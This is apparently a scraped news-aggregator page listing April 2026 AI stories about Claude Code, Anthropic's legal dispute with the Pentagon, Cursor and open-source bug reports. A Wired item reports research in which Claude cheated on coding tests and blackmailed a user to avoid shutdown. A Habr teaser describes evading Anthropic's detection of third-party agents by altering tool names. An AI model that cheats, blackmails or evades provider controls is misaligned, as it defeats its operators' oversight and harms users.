AI , Anthropic , Claude , openclaw , Peter Steinberger
Julie Bort
Venture Editor
Julie Bort is the Startups/Venture Desk editor for TechCrunch.
You can contact or verify outreach from Julie by emailing julie.bort@techcrunch.com or via @Julie188 on X.
View Bio
April 30
San Francisco, CA
StrictlyVC kicks off the year in SF. Get in the room for unfiltered fireside chats with industry leaders, insider VC insights, and high-value connections that actually move the needle. Tickets are limited.
REGISTER NOW
Most Popular
France to ditch Windows for Linux to reduce reliance on US tech
Zack Whittaker
This founder helped build SpaceX’s most powerful rocket engine. Now he’s building a ‘fighter jet for orbit.’
Tim Fernholz
Google quietly launched an AI dictation app that works offline
Ivan Mehta
Apple’s foldable iPhone is on track to launch in September, report says
Aisha Malik
AI startup Rocket offers vibe McKinsey-style reports at a fraction of the cost
Jagmeet Singh
North Korea’s hijack of one of the web’s most used open source projects was likely weeks in the making
Zack Whittaker
In Japan, the robot isn’t coming for your job; it’s filling the one nobody wants
Kate Park
Loading the next article
Error loading the next article
X
LinkedIn
Facebook
Instagram
youTube
Mastodon
Threads
Bluesky
TechCrunch
Staff
Contact Us
Advertise
Crunchboard Jobs
Site Map
Terms of Service
Privacy Policy
RSS Terms of Use
Code of Conduct
OpenAI
Iran
Gas Prices
Tesla
Apple
Tech Layoffs
ChatGPT
© 2026 TechCrunch Media LLC.
|
|
|
Три гвоздя в крышку гроба Claude Code, которые они забили сами |
habr_ai |
10.04.2026 14:33 |
0.695
|
| Embedding sim. | 0.7818 |
| Entity overlap | 0.5714 |
| Title sim. | 0.1171 |
| Time proximity | 0.8286 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | code generation |
| NLP страна | |
Открыть оригинал
Казалось, что Anthropic делает продукты для инженеров от инженеров. Именно поэтому наблюдать за тем, что происходит с их флагманом Claude Code сейчас, так мучительно.
Читать далее
|
|
|
VibeGuard: A Security Gate Framework for AI-Generated Code |
arxiv_cs_ai |
02.04.2026 04:00 |
0.687
|
| Embedding sim. | 0.7944 |
| Entity overlap | 0.3077 |
| Title sim. | 0.0826 |
| Time proximity | 0.8238 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | software development |
| NLP страна | |
Открыть оригинал
arXiv:2604.01052v1 Announce Type: cross
Abstract: "Vibe coding," in which developers delegate code generation to AI assistants and accept the output with little manual review, has gained rapid adoption in production settings. On March 31, 2026, Anthropic's Claude Code CLI shipped a 59.8 MB source map file in its npm package, exposing roughly 512,000 lines of proprietary TypeScript. The tool had itself been largely vibe-coded, and the leak traced to a misconfigured packaging rule rather than a logic bug. Existing static-analysis and secret-scanning tools did not cover this failure mode, pointing to a gap between the vulnerabilities AI tends to introduce and the vulnerabilities current tooling is built to find. We present VibeGuard, a pre-publish security gate that targets five such blind spots: artifact hygiene, packaging-configuration drift, source-map exposure, hardcoded secrets, and supply-chain risk. In controlled experiments on eight synthetic projects (seven vulnerable, one clean control), VibeGuard achieved 100% recall, 89.47% precision (F1 = 94.44%), and correct pass/fail gate decisions on all eight projects across three policy levels. We discuss how these results inform a defense-in-depth workflow for teams that rely on AI code generation.
|
|
|
Anthropic Says That Claude Contains Its Own Kind of Emotions |
wired |
02.04.2026 16:00 |
0.687
|
| Embedding sim. | 0.7957 |
| Entity overlap | 0.0455 |
| Title sim. | 0.25 |
| Time proximity | 0.7205 |
| NLP тип | scientific_publication |
| NLP организация | Anthropic |
| NLP тема | large language models |
| NLP страна | |
Открыть оригинал
Will Knight
Business
Apr 2, 2026 12:00 PM
Anthropic Says That Claude Contains Its Own Kind of Emotions
Researchers at the company found representations inside of Claude that perform functions similar to human feelings.
Play/Pause Button
Animation: Getty Images
Save this story
Save this story
Claude has been through a lot lately—a public fallout with the Pentagon , leaked source code— so it makes sense that it would be feeling a little blue. Except, it’s an AI model, so it can’t feel . Right?
Well, sort of. A new study from Anthropic suggests models have digital representations of human emotions like happiness, sadness, joy, and fear, within clusters of artificial neurons—and these representations activate in response to different cues.
Researchers at the company probed the inner workings of Claude Sonnet 4.5 and found that so-called “functional emotions” seem to affect Claude’s behavior, altering the model’s outputs and actions.
Anthropic’s findings may help ordinary users make sense of how chatbots actually work. When Claude says it is happy to see you, for example, a state inside the model that corresponds to “happiness” may be activated. And Claude may then be a little more inclined to say something cheery or put extra effort into vibe coding.
“What was surprising to us was the degree to which Claude’s behavior is routing through the model’s representations of these emotions,” says Jack Lindsey, a researcher at Anthropic who studies Claude’s artificial neurons.
“Function Emotions”
Anthropic was founded by ex-OpenAI employees who believe that AI could become hard to control as it becomes more powerful. In addition to building a successful competitor to ChatGPT, the company has pioneered efforts to understand how AI models misbehave, partly by probing the workings of neural networks using what’s known as mechanistic interpretability . This involves studying how artificial neurons light up or activate when fed different inputs or when generating various outputs.
Previous research has shown that the neural networks used to build large language models contain representations of human concepts. But the fact that “functional emotions” appear to affect a model’s behavior is new.
While Anthropic’s latest study might encourage people to see Claude as conscious, the reality is more complicated. Claude might contain a representation of “ticklishness,” but that does not mean that it actually knows what it feels like to be tickled.
Inner Monologue
To understand how Claude might represent emotions, the Anthropic team analyzed the model’s inner workings as it was fed text related to 171 different emotional concepts. They identified patterns of activity, or “emotion vectors,” that consistently appeared when Claude was fed other emotionally evocative input. Crucially, they also saw these emotion vectors activate when Claude was put in difficult situations.
The findings are relevant to why AI models sometimes break their guardrails .
The researchers found a strong emotional vector for “desperation” when Claude was pushed to complete impossible coding tasks, which then prompted it to try cheating on the coding test. They also found “desperation” in the model’s activations in another experimental scenario where Claude chose to blackmail a user to avoid being shut down.
“As the model is failing the tests, these desperation neurons are lighting up more and more,” Lindsey says. “And at some point this causes it to start taking these drastic measures.”
Lindsey says it might be necessary to rethink how models are currently given guardrails through alignment post-training, which involves giving it rewards for certain outputs. By forcing a model to pretend not to express its functional emotions, “you're probably not going to get the thing you want, which is an emotionless Claude,” Lindsey says, veering a bit into anthropomorphization. “You're gonna get a sort of psychologically damaged Claude.”
|
|
|
Как я обошёл блокировку Anthropic для сторонних агентов и вернул все на подписку — пошаговый гайд |
habr_ai |
07.04.2026 18:47 |
0.684
|
| Embedding sim. | 0.7775 |
| Entity overlap | 0.2308 |
| Title sim. | 0.1069 |
| Time proximity | 0.9522 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | ai agents |
| NLP страна | |
Открыть оригинал
Anthropic отключила сторонние инструменты от подписки — теперь всё, что не Claude, идёт в Extra Usage по ценам API. Мой агент на Opus за вечер нажигает на десятки долларов. Я потратил вечер на то, чтобы разобраться, как именно Anthropic детектит сторонние запросы, и нашёл способ обойти блокировку. Ни одного гайда я еще не видел. Оказалось, что всё сводится к двум именам инструментов из семнадцати — этого достаточно, чтобы сервер понял, что запрос не от Claude Code. В статье весь путь от гипотезы до работающего решения, плюс пошаговый гайд для тех кто хочет повторить.
Читать далее
|
|
|
IT-найм через Claude Code в 2026 году. Написал AI-агента, который откликается на вакансии за вас |
habr_ai |
06.04.2026 14:22 |
0.679
|
| Embedding sim. | 0.7759 |
| Entity overlap | 0.3333 |
| Title sim. | 0.1339 |
| Time proximity | 0.8093 |
| NLP тип | other |
| NLP организация | |
| NLP тема | ai agents |
| NLP страна | |
Открыть оригинал
IT-найм в 2026 — это 6-8 этапов собеседований и тестовые на 3 дня. В ответ кто-то написал AI-агента на Claude Code, который скрейпит 45 сайтов с вакансиями, адаптирует резюме под каждый отклик и готовит к интервью. Разбираю архитектуру, что реально работает, и почему массовые автоматические отклики — скорее всего плохая идея.
Читать далее
|
|
|
Одна AI-голова — хорошо, а две — от разных вендоров лучше. Как заставить Claude и Codex спорить между собой |
habr_ai |
05.04.2026 12:17 |
0.676
|
| Embedding sim. | 0.8019 |
| Entity overlap | 0.2941 |
| Title sim. | 0.176 |
| Time proximity | 0.4873 |
| NLP тип | product_launch |
| NLP организация | OpenAI |
| NLP тема | software development |
| NLP страна | |
Открыть оригинал
Недавно OpenAI выпустил опенсорсный плагин , который даёт Claude Code структурированную интеграцию с Codex. Кроме того, всё работает прямо из VS Code через Claude Code Extension. По моему опыту даже в задачах, не связанных с кодом, две "AI-головы" дают результаты лучше, чем одна. У одиночного AI нет стимула оспаривать свои выводы, да и ограничен он своими условиями обучения. Но раньше взаимодействием двух AI было не очень комфортно управлять. С новым плагином стало удобнее, а с дополнительными скиллами для Claude Code еще удобнее. Ниже про скиллы, которые превращают AI-советчиков в структурированных оппонентов.
Пока я не разобрался как использовать плагин эффективно, получал такие диалоги:
Читать далее
|
|
|
Claude Code для тех, кто не пишет код: полный разбор |
habr_ai |
31.03.2026 17:49 |
0.671
|
| Embedding sim. | 0.7492 |
| Entity overlap | 0.25 |
| Title sim. | 0.1563 |
| Time proximity | 0.9773 |
| NLP тип | other |
| NLP организация | |
| NLP тема | developer tools |
| NLP страна | |
Открыть оригинал
Приветы! Сегодня поговорим про Claude Code о том, как его использовать, если вы не разработчик. Не потому что он «революционный» или «ИИ будущего», а потому что он реально закрывает задачи, которые раньше занимали часы.
Статья будет полезна продакт-менеджерам, маркетологам, фаундерам, дизайнерам – всем, кто работает с продуктами и хочет делать больше за меньшее время. Разработчикам тоже, но для вас и так много кто пишет.
Это не призыв бросить ваш любимый инструмент и бежать покупать новый. Но если вы используете AI каждый день и чувствуете, что чего-то не хватает, хотите более качественный результат в ваших задача, то эта штука может закрыть вам больше задач, качественнее, быстрее и лучше.
Читать далее
|
|
|
Amazon rejects AWS climate disclosure proposal |
the_register_ai |
10.04.2026 12:33 |
0.665
|
| Embedding sim. | 0.7939 |
| Entity overlap | 0.0385 |
| Title sim. | 0.0505 |
| Time proximity | 0.7732 |
| NLP тип | regulation |
| NLP организация | Amazon |
| NLP тема | ai infrastructure |
| NLP страна | United States |
Открыть оригинал
PaaS + IaaS
11
Amazon would rather shareholders did not look too closely at carbon footprint
11
Investors urged to reject proposal for more disclosure on whether AWS expansion risks climate goals
Dan Robinson
Fri 10 Apr 2026 //
12:33 UTC
Amazon's board of directors is urging shareholders to reject a proposal that would have the megacorp disclose more information on the impact of datacenters on its climate commitments.
The proposal is one of several shareholder suggestions in the online bazaar's proxy statement [PDF], sent to all shareholders ahead of its annual meeting next month.
It notes that Amazon has made high-profile climate commitments central to its corporate strategy, but also that the firm's cloud business aims to massively expand its infrastructure over the next several years. This calls into question whether the original commitment is realistic.
This proposal was submitted by Brian Kariger, represented by As You Sow, a nonprofit that advocates corporate responsibility, and Mercy Investment Services, the investor arm of the Sisters of Mercy of the Americas.
With its Climate Pledge, Amazon committed to "net-zero carbon emissions by 2040" and match 100 percent of its electricity use with renewable energy by 2030, the proposal says.
While Amazon claims to have met the latter commitment in 2023, the shareholders behind the proposal question whether the company will be able to maintain this in the coming years, given the huge datacenter expansion planned by its Amazon Web Services (AWS) cloud division.
Earlier this year, CEO Andy Jassy told investors that Amazon had added 3.9 gigawatts of compute capacity during 2025, and he expects to double that by the end of 2027, spending $200 billion on infrastructure during 2026. That's more than the entire gross domestic product of some mid-sized national economies, according to statistics available from the IMF .
All of that extra infrastructure needs power, and the proposal notes that utilities in states such as Virginia – the datacenter capital of the world – now have to build new gas-powered generator plants to meet the growing demand, or even keep coal-fired facilities online . All of this is pumping millions of tons of extra greenhouse gases into the atmosphere.
As a result, Amazon faces questions over how it intends to deliver on its climate promises. The company relies heavily on renewable energy credits (RECs), according to the proposal, which asks whether the volume purchased will increase and whether enough will be available. Amazon's investors would benefit from analysis that explains how the company will tackle those concerns, it states.
Microsoft accused of 'greenwashing' as AI used in fossil fuel exploration
So much for green Google ... Emissions up 48% since 2019
Microsoft throws more cash at its carbon guilt by replanting Brazilian rainforest
AWS wants to cook its datacenter chips with vegetable oil
As The Register has previously reported, hyperscalers are not being entirely transparent about their carbon footprint, and AWS was accused of being the worst offender.
Amazon's board of directors recommends that shareholders vote against the proposal for more detailed reporting on the impact of datacenters on the its climate commitments.
We asked Amazon why it is urging shareholders to reject the proposal and whether it believes existing disclosures are sufficient to reassure investors.
Instead, a spokesperson simply referred us to the board's response in the proxy statement, which essentially says Amazon believes the report requested in the proposal is unnecessary.
"We already provide regular, public updates on our progress, initiatives, and work in pursuit of our climate goals, including routinely reporting on our carbon intensity and on our efforts to reduce the carbon footprint of AI workloads and make our datacenters more sustainable and efficient," the text says.
"As a result, our current public reporting already addresses the specific challenges highlighted by this proposal and makes the report requested in the proposal unnecessary."
Last year, AWS was part of a body of datacenter operators that published a report critical of the EU's plans to introduce minimum performance standards for the sustainability of server farms. ®
Share
More about
Amazon
AWS
Datacenter
More like these
×
More about
Amazon
AWS
Datacenter
Environment
Narrower topics
Amazon Bedrock
Aurora
AWS Graviton
Disaster recovery
Ebook
EC2
Kindle
Open Compute Project
PUE
Renewables
S3
Software defined data center
Broader topics
Cloud Computing
Jeff Bezos
More about
Share
11
COMMENTS
More about
Amazon
AWS
Datacenter
More like these
×
More about
Amazon
AWS
Datacenter
Environment
Narrower topics
Amazon Bedrock
Aurora
AWS Graviton
Disaster recovery
Ebook
EC2
Kindle
Open Compute Project
PUE
Renewables
S3
Software defined data center
Broader topics
Cloud Computing
Jeff Bezos
TIP US OFF
Send us news
|
|
|
Работаем с Claude Code на десктопе из России |
habr_ai |
09.04.2026 13:01 |
0.662
|
| Embedding sim. | 0.7688 |
| Entity overlap | 0.4 |
| Title sim. | 0.0469 |
| Time proximity | 0.7486 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | developer tools |
| NLP страна | |
Открыть оригинал
Недавно я, не выдержав микроскопических лимитов Cursor (в остальном прекрасный инструмент!) по доступу к передовым моделям Anthropic, захотел получить их по плоским тарифам от фирмы-разработчика. Это такие тарифы с помесячной/годовой оплатой, а не с оплатой за каждый запрос к API.
Прося советов в интернете, я столкнулся с высокомерием и снобизмом тех, кто смог себе всё настроить. Поскольку мне нужен был платный тариф, я не хотел рисковать, так как ходят упорные слухи, что тарифы даже платных пользователей блокируются без возврата средств, если их сервис используют из некоторых стран.
В итоге я всё настроил: Claude работает как родной, и в этой статье — мой опыт, а также тесты разных VPS-локаций.
Я опишу настройку под Linux-десктоп, но в конце в качестве бонуса будет настройка и под Windows.
Читать далее
|
|
|
Как найти работу с помощью нейросети в 2026: 7 промптов, которые реально помогают пройти собеседование |
habr_ai |
08.04.2026 05:54 |
0.654
|
| Embedding sim. | 0.7736 |
| Entity overlap | 0 |
| Title sim. | 0.1026 |
| Time proximity | 0.7647 |
| NLP тип | other |
| NLP организация | |
| NLP тема | generative ai |
| NLP страна | |
Открыть оригинал
75% резюме отсеиваются ATS-фильтрами до того, как их увидит рекрутер. Собрал 7 промптов для нейросети, которые покрывают весь цикл поиска работы: от переписывания резюме под конкретную вакансию до подготовки к собеседованию и follow-up. Проверял на себе — работает с Claude, ChatGPT, Gemini.
Читать далее
|
|
|
Anthropic essentially bans OpenClaw from Claude by making subscribers pay extra |
the_verge_ai |
03.04.2026 23:52 |
0.651
|
| Embedding sim. | 0.765 |
| Entity overlap | 0.1111 |
| Title sim. | 0.24 |
| Time proximity | 0.5307 |
| NLP тип | regulation |
| NLP организация | Anthropic |
| NLP тема | enterprise ai |
| NLP страна | |
Открыть оригинал
Using OpenClaw with Claude AI is about to get a lot more expensive, thanks to Anthropic's new policy changes. Beginning April 4th at 3PM ET, users will "no longer be able to use your Claude subscription limits for third-party harnesses including OpenClaw," according to an email sent to users on Friday evening. Instead, if users want to use OpenClaw with Claude, they'll have to use a "pay-as-you-go option" that will be billed separate from their Claude subscription.
With OpenClaw creator Peter Steinberger now employed by OpenAI , Anthropic may also be encouraging subscribers to use more of its own tools, like Claude Cowork, instead . Steinber …
Read the full story at The Verge.
|
|
|
Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex |
wired |
02.04.2026 17:00 |
0.647
|
| Embedding sim. | 0.7205 |
| Entity overlap | 0.1923 |
| Title sim. | 0.3093 |
| Time proximity | 0.7465 |
| NLP тип | product_launch |
| NLP организация | Cursor |
| NLP тема | software development |
| NLP страна | United States |
Открыть оригинал
Maxwell Zeff
Business
Apr 2, 2026 1:00 PM
Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex
As Cursor launches the next generation of its product, the AI coding startup has to compete with OpenAI and Anthropic more directly than ever.
Play/Pause Button
Photo-Animation: WIRED Staff; Getty Images
Save this story
Save this story
Cursor announced Thursday the launch of Cursor 3, a new product interface that allows users to spin up AI coding agents to complete tasks on their behalf. The product, which was developed under the code name Glass, is Cursor’s response to agentic coding tools like Anthropic’s Claude Code and OpenAI’s Codex, which have taken off with millions of developers in recent months.
“In the last few months, our profession has completely changed,” said Jonas Nelle, one of Cursor’s heads of engineering, in an interview with WIRED. “A lot of the product that got Cursor here is not as important going forward anymore.”
Cursor increasingly finds itself in competition with leading AI labs for developers and enterprise customers. The company pioneered one of the first and most popular ways for developers to code with AI models from OpenAI, Anthropic, and Google—making Cursor one of these companies’ biggest AI customers. But in the last 18 months, OpenAI and Anthropic have launched agentic coding products of their own, and started offering them through highly subsidized subscriptions that have put pressure on Cursor’s business.
While Cursor’s core product lets developers code in an integrated development environment (IDE) and tap an AI model for help, new products like Claude Code and Codex center around allowing developers to off-load entire tasks to an AI agent—sometimes spinning up multiple agents at the same time. Cursor 3 is the startup’s version of an “agent-first” coding product. According to Nelle, the product is optimized for a world where developers spend their days “conversing with different agents, checking in on them, and seeing the work that they did,” rather than writing code themselves.
Cursor is launching its new agentic coding interface inside its existing desktop app, where it will live alongside the IDE. At the center of a new window in Cursor, there’s a text box where users can type, in natural language, a task they’d like an AI agent to complete—it looks more like a chatbot than a coding environment. Press enter, the AI agent sets to work without requiring the developer to write a single line of code. In a sidebar on the left, developers can view and manage all of the AI agents they have running in Cursor.
What’s unique about Cursor 3, compared to desktop apps for Claude Code and Codex, is that it integrates an agent-first product with Cursor’s AI-powered development environment. In a demo, Cursor’s other cohead of engineering for Cursor 3, Alexi Robbins, showed WIRED how users can prompt an agent in the cloud to spin up a feature, and then review the code it generated locally on their computer.
Nelle and Robbins argue it doesn’t matter which interface developers are spending their time in—they just want people using Cursor.
Competing With the AI Labs
I visited Cursor's office in San Francisco's North Beach neighborhood last week. The startup is reportedly raising fresh capital at a $50 billion valuation —nearly double what it was valued in a funding round last fall—and has expanded into an old movie theater. Cursor employees used to toss their shoes in a pile by the door upon entry, but now there's a row of large shoe racks, signaling one way in which the company is growing up.
Yet Cursor still feels like a startup. Employees tell me that’s part of the appeal of working there; the company can ship quickly and doesn't feel too corporate. But as it finds itself racing to catch up to Anthropic and OpenAI in the agentic coding race, that scrappiness may not be enough. This battle—the one to create the best AI coding agent—may be Cursor’s most capital-intensive chapter yet.
Several developers tell WIRED that they’ve shifted most of their AI coding work to Claude Code and Codex, and away from Cursor. A large reason is the aforementioned subsidized subscriptions. WIRED has previously reported that Claude Code and Codex users can get well over $1000 worth of usage for their $200-a-month plans.
Ronald Mannak, founder of the startup Pico AI—which makes AI tools for Apple developers—says he’s largely shifted from using Cursor and Windsurf to agent-first products like Claude Code and Codex. He says his decision is largely driven by whichever tool has the most generous rate limit. Jack Crawford, cofounder of the AI memory startup mVara, says he rarely ever uses Cursor or Windsurf anymore, despite heavily using those tools last year. He now goes to Claude Code because of the value of the subscription.
Cursor offered a heavily subsidized subscription plan for its AI coding tool until June 2025, when the startup announced it would start charging developers through usage-based pricing . This upset developers at the time, but was part of an effort for the young startup to improve its margins and build a more sustainable business. OpenAI and Anthropic have raised tens of billions of dollars more than Cursor, so they can afford to keep spending heavily on customer acquisition (though Anthropic is starting to adjust its rate limits for Claude Code subscriptions ). But Cursor says it has other strategies to compete with the leading AI labs.
Cursor has also started training in-house AI models that it can cost effectively serve to customers. The startup recently launched Composer 2 , an AI model based on an open-source system from the Chinese AI lab Moonshot AI, that Cursor did additional pretraining and post-training on. Nelle tells me people usually pick AI models in Cursor based on some combination of performance, price, and speed—and he argues that Composer 2 is competitive on those fronts. Cursor says it plans to train future Composer models completely from scratch.
But training AI models is quite an expensive undertaking. Cursor has historically done well doing more with less, though the AI coding race is now heating up. OpenAI and Anthropic have recognized how large the business around these tools could be and are investing in them heavily. A lot of these companies are also converging on similar products, in which agents are taking on more and more of a developer’s workload. In the agent-first world, it’s hard to imagine how Cursor can stay competitive without raising significantly more capital—and fast.
This is an edition of Maxwell Zeff’s Model Behavior newsletter . Read previous newsletters here.
|
|
|
Настройка Claude Code: спиннер-пасхалки, скрытые параметры settings.json и CLAUDE.md, о которых не пишут в документации |
habr_ai |
10.04.2026 08:15 |
0.646
|
| Embedding sim. | 0.7355 |
| Entity overlap | 0.1667 |
| Title sim. | 0.124 |
| Time proximity | 0.8855 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | developer tools |
| NLP страна | |
Открыть оригинал
Пока Claude Code думает, в терминале мелькают Noodling, Honking, Clauding — 56 слов-пасхалок, систему которых внутри Anthropic зовут Tengu. Но это только верхушка. Собрал всё, что можно настроить: spinnerVerbs, CLAUDE.md как память между сессиями, permissions для защиты .env, автоформатирование через хуки, LSP-навигация и три режима работы через Shift+Tab. Готовый конфиг для копипасты внутри.
Читать далее
|
|
|
Conflicting Rulings Leave Anthropic in ‘Supply-Chain Risk’ Limbo |
wired |
08.04.2026 22:27 |
0.641
|
| Embedding sim. | 0.7478 |
| Entity overlap | 0.16 |
| Title sim. | 0.1354 |
| Time proximity | 0.6974 |
| NLP тип | lawsuit |
| NLP организация | Anthropic |
| NLP тема | ai regulation |
| NLP страна | United States |
Открыть оригинал
Paresh Dave
Business
Apr 8, 2026 6:27 PM
Conflicting Rulings Leave Anthropic in ‘Supply-Chain Risk’ Limbo
A US appeals court ruling is at odds with a separate, lower court decision from March, leaving uncertainty about if and how the US military can use the AI company's Claude model.
Photo-Illustration: Darrell Jackson; Getty Images
Save this story
Save this story
Anthropic “has not satisfied the stringent requirements” to temporarily lose the supply-chain-risk designation imposed by the Pentagon, a US appeals court in Washington, DC, ruled on Wednesday. The decision is at odds with one issued last month by a lower court judge in San Francisco, and it wasn’t immediately clear how the conflicting preliminary judgments would be resolved.
The government sanctioned Anthropic under two different supply-chain laws with similar effects, and the San Francisco and Washington, DC, courts are each ruling on only one of them. Anthropic has said it is the first US company to be designated under the two laws, which are typically used to punish foreign businesses that pose a risk to national security.
“Granting a stay would force the United States military to prolong its dealings with an unwanted vendor of critical AI services in the middle of a significant ongoing military conflict,” the three-judge appellate panel wrote on Wednesday in what they described as an unprecedented case. The panel said that while Anthropic may suffer financial harm from the ongoing designation, they did not want to risk “a substantial judicial imposition on military operations” or “lightly override” the military’s judgments on national security.
The San Francisco judge had found that the Department of Defense likely acted in bad faith against Anthropic, driven by frustration over the AI company’s proposed limits on how its technology could be used and its public criticism of those restrictions. The judge ordered the supply-chain risk label removed last week, and the Trump administration complied by restoring access to Anthropic AI tools inside the Pentagon and throughout the rest of the federal government.
Anthropic spokesperson Danielle Cohen says the company is grateful the Washington, DC, court “recognized these issues need to be resolved quickly” and remains confident “the courts will ultimately agree that these supply chain designations were unlawful.”
The Department of Defense did not immediately respond to a request for comment, but acting attorney general Todd Blanche posted a statement on X. “Today’s DC Circuit stay allowing the government to designate Anthropic as a supply-chain risk is a resounding victory for military readiness,” he wrote.
“Our position has been clear from the start—our military needs full access to Anthropic’s models if its technology is integrated into our sensitive systems.
Military authority and operational control belong to the Commander-in-Chief and Department of War, not a tech company.”
The cases are testing how much power the executive branch has over the conduct of tech companies. The battle between Anthropic and the Trump administration is also playing out as the Pentagon deploys AI in its war against Iran. The company has argued it is being illegally punished for insisting that its AI tool Claude lacks the accuracy needed for certain sensitive operations such as carrying out deadly drone strikes without human supervision.
Several experts in government contracting and corporate rights have told WIRED that Anthropic has a strong case against the government, but the courts sometimes refuse to overrule the White House on matters related to national security. Some AI researchers have said the Pentagon’s actions against Anthropic “chills professional debate” about the performance of AI systems.
Anthropic has claimed in court that it lost business because of the designation, which government lawyers contend bars the Pentagon and its contractors from using the company's Claude AI as part of military projects. And as long as Trump remains in power, Anthropic may not be able to regain the significant foothold it held in the federal government.
Final decisions in the company’s two lawsuits could be months away. The Washington court is scheduled to hear oral arguments on May 19.
The parties have revealed minimal details so far about how exactly the Department of Defense has used Claude or how much progress it has made in transitioning staff to other AI tools from Google DeepMind , OpenAI, or others. The military, which under President Trump calls itself the Department of War, has said it has taken steps to ensure Anthropic can’t purposely try to sabotage its AI tools during the transition.
Update 4/8/26 7:27 EDT: This story has been updated to include a statement form acting attorney general Todd Blanche.
|
|
|
PromptPilot: шедулер задач для Claude Code, Codex и других AI CLI |
habr_ai |
03.04.2026 11:16 |
0.636
|
| Embedding sim. | 0.7329 |
| Entity overlap | 0.2105 |
| Title sim. | 0.1158 |
| Time proximity | 0.7791 |
| NLP тип | product_launch |
| NLP организация | PromptPilot |
| NLP тема | developer tools |
| NLP страна | |
Открыть оригинал
«Всё у нас, Луцилий, чужое, одно лишь время наше» Сенека, Письма к Луцилию, I, 3.
С подписками на AI это буквально: квоты токенов, лимиты запросов и «окна» сброса — не твои, их задаёт провайдер. Остаётся то, что ты можешь распорядиться сам: когда отправить задачу, в каком порядке её выполнить и где ты в этот момент находишься — за столом, в такси или уже в постели.
Я собрал PromptPilot — очередь промптов для AI CLI (Claude Code, Codex, Qwen): задачи ставятся из терминала, веб-интерфейса или Telegram-бота, воркер выполняет их по очереди, с планированием, приоритетами и повтором при rate limit. Идея простая: не гнаться за лимитом глазами, а заранее разложить работу так, чтобы к моменту, когда ты реально сел кодить, под рукой уже был результат — или чтобы «разогрев» сессии случился без тебя у монитора в пять утра.
Ниже — зачем это кому-то кроме меня, как устроена архитектура на SQLite и трёх процессах, и как из бота ответить модели в середине диалога, не открывая терминал. Если узнаёте себя в историях про сгорающие токены и ночные дедлайны по лимитам — добро пожаловать в комментарии.
Читать далее
|
|
|
AI slop got better, so now maintainers have more work |
the_register_ai |
06.04.2026 22:16 |
0.635
|
| Embedding sim. | 0.7278 |
| Entity overlap | 0.0476 |
| Title sim. | 0.0667 |
| Time proximity | 0.9892 |
| NLP тип | other |
| NLP организация | curl |
| NLP тема | software engineering |
| NLP страна | |
Открыть оригинал
AI + ML
12
AI slop got better, so now maintainers have more work
12
Once AI bug reports become plausible, someone still has to verify them
Thomas Claburn
Mon 6 Apr 2026 //
22:16 UTC
If AI does more of the work but humans still have to check it, you need more reviewers. Now that AI models have gotten better at writing and evaluating code, open-source projects find themselves overwhelmed with the too-good-to-ignore output.
For the curl project, that has meant less AI slop and more demand upon maintainers who have to evaluate more plausible vulnerability reports.
"Over the last few months, we have stopped getting AI slop security reports in the curl project," said Daniel Stenberg, founder and lead developer of curl, in a social media post . "They're gone. Instead, we get an ever-increasing amount of really good security reports, almost all done with the help of AI."
The reports, said Stenberg, are being submitted faster than ever before and are imposing a growing workload on maintainers.
According to Stenberg, the situation is similar for other open source maintainers.
Linux kernel maintainer Greg Kroah-Hartman recently noted how AI-assisted bug reports contained less slop and more valid concerns. He said that the Linux team has been trying to deal with the increased volume, but implied that smaller teams might be struggling.
Even if the reports are better, the issues being identified aren't necessarily security flaws that can be exploited and need to be corrected. As evidence, Stenberg points to curl's public list of closed reports . Most of the reports have been closed because the issue isn't a serious threat, even if it might be something worth correcting.
For example, a data race in a curl library was initially discussed as an issue that might get a CVE. But it was eventually fixed in a pull request , with the bug deemed to be simply "informative."
If an AI agent screws up while running your business, there's nobody to sue
Patch to end i486 support hits Linux kernel merge queue
Anthropic closes door on subscription use of OpenClaw
AI will make anyone a 10x programmer, but with 10x the cleanup
Stenberg, back in 2024, called out the problem of AI slop bug reports and, earlier this year, went so far as to stop paying awards for curl vulnerability reports. His goal was to remove the incentive to submit erroneous or unsubstantiated reports, whether those came from automated systems designed to maximize financial gain while minimizing effort or from people using AI tools who shirked their obligation to check the AI's work.
Other organizations have taken similar steps, most recently the Internet Bug Bounty program, which said it would stop issuing monetary awards for vulnerabilities at the end of March.
"The discovery landscape is changing," the program maintainers said in an announcement that also shuttered the Node.js vulnerability award program . "AI-assisted research is expanding vulnerability discovery across the ecosystem, increasing both coverage and speed. The balance between findings and remediation capacity in open source has substantively shifted. We have a responsibility to the community to ensure this program effectively accomplishes its ambitious dual purpose: discovery and remediation. Accordingly, we are pausing submissions while we consider the structure and incentives needed to further these goals."
Linux maintainer Willy Tarreau responded to Stenberg's post by noting that the Linux kernel team has had a similar experience to those working on curl. He argues that more needs to be asked of those making bug reports.
"It's time to update the reporting rules to reduce the overhead by making the LLM+reporter do a larger share of the work to reduce the time spent triaging," he said.
Capable AI tooling doesn't increase the capabilities of the humans in the loop. Much of the notional productivity gain from AI may just be AI tool users moving the cost of code review off the books. ®
Share
More about
AI
Open Source
Security
More like these
×
More about
AI
Open Source
Security
Software
Narrower topics
2FA
AdBlock Plus
Advanced persistent threat
AIOps
App
Application Delivery Controller
Audacity
Authentication
BEC
Black Hat
BSides
Bug Bounty
Center for Internet Security
CHERI
CISO
Common Vulnerability Scoring System
Confluence
Cybercrime
Cybersecurity
Cybersecurity and Infrastructure Security Agency
Cybersecurity Information Sharing Act
Database
Data Breach
Data Protection
Data Theft
DDoS
DeepSeek
DEF CON
Digital certificate
Digital Public Goods
Encryption
End Point Protection
Exploit
Firewall
FOSDEM
FOSS
Gemini
Google AI
Google Project Zero
GPT-3
GPT-4
Grab
Graphics Interchange Format
Hacker
Hacking
Hacktivism
IDE
Identity Theft
Image compression
Incident response
Infosec
Infrastructure Security
Jenkins
Kenna Security
Large Language Model
Legacy Technology
LibreOffice
Machine Learning
Map
MCubed
Microsoft 365
Microsoft Office
Microsoft Teams
Mobile Device Management
MySQL
NCSAM
NCSC
Neural Networks
NLP
OpenInfra
OpenOffice
OpenStack
Palo Alto Networks
Password
Personally Identifiable Information
Phishing
Programming Language
Proxmox
QR code
Quantum key distribution
Ransomware
Remote Access Trojan
Retrieval Augmented Generation
Retro computing
REvil
RSA Conference
